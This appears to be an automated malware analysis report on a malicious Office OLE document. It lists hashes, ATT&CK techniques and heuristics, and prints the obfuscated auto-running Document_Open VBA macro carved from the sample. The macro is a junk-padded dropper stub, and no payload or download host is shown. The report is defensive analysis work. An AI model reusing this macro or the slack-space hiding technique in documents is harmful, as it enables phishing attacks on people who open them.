Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 311b1071f5328c37…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 60.8 KB
First seen: 2019-04-17
MD5: 7985066c7ae0b97538b4d86e5fdb985c
SHA-1: 32acf2bc24526c98cbdf7c7b963a6d98c7eea167
SHA-256: 311b1071f5328c37b3d899098fd6a5c34901ccffe01c84601e76c3a68703a968
Risk score: 102

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is an OLE document containing a VBA macro named Document_Open, which runs automatically when the document is opened. The macro code is heavily obfuscated, which makes its exact function difficult to determine, but it likely attempts to download and execute a secondary payload. The presence of a Document_Open macro together with the OLE slack anomaly suggests malicious intent.

Heuristics (4)

  • OLE document has large unaccounted-for region (severity: high; OLE_SLACK_ANOMALY)
    The OLE file is 62,273 bytes, but its declared streams total only 36,254 bytes; the remaining 26,019 bytes (42%) lie in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected (severity: medium; OLE_VBA_MACROS; 1 related finding)
    The document contains VBA macro code.
  • Document_Open macro (severity: high; OLE_VBA_DOCOPEN)
    The document contains a Document_Open macro, which runs automatically when the document is opened.
  • Embedded URL (severity: info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body; this is the standard DrawingML XML namespace URI, not a host the macro contacts)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1271 bytes
SHA-256: dc154782098774cc73fa6007fb5ba05a277e390e1a6d1480953f599ac0885752

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "WOKSzAjrcOJvkM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
   If CWfXmK = Vpcqw Then

Dim OsaZv()
JWaOzH = OCRkm + LdkMXH + BFqCz + XdhBG
tdKOb = iPMvJ + EpOmb + fDRqiE + YOnjwj

End If
   If WGIik <> GhBXE Then

Dim otomto()
iGbHIB = jzzsuz + mRJXE + HXJFZ + fLditM
mQwuz = cwVIi + cFiCc + OpWiLw + hfWbC

End If
   If szBOIE > 6 Then

Dim ssFvmz()
vlBDW = jDwFi + uufQP
sUzPl = WbNZw + JtaEr

End If
   If diGApA > 8 Then

Dim jEJuMb()
mucMjA = hvqJFY + pcpDhV + ilTIOp + RRSNWi
wzrKw = wjQrk + wqbUrf + EIIJE + KIQdX

End If
   If qaqfws <= PpvUcY Then

Dim rppzbi()
dNqon = ozjFtv + lXAwV
wqPNnj = jSTajv + RMMAr + AtSJp + jWATpt

End If
   If laOACH >= MViFY Then

Dim ijZLAF()
zCXFX = AJfzd + FScrzL + jEoYnE + iwmbI
nQjiCI = rHwjWA + TfGsb

End If
arwXTMXIaOE (rUVqV + cwbjM + PbXIs + OiEEiHMCU + SzLiH + LJuvGwKqwa + EWzvnpsuV + UWdFcLtrZXz + NQhYniRcOH + qMsqXJW + lObvwW)
   If BziXh <= FzYSU Then

Dim VSpci()
spLFVs = AwwVa + JZRBUb

End If
End Sub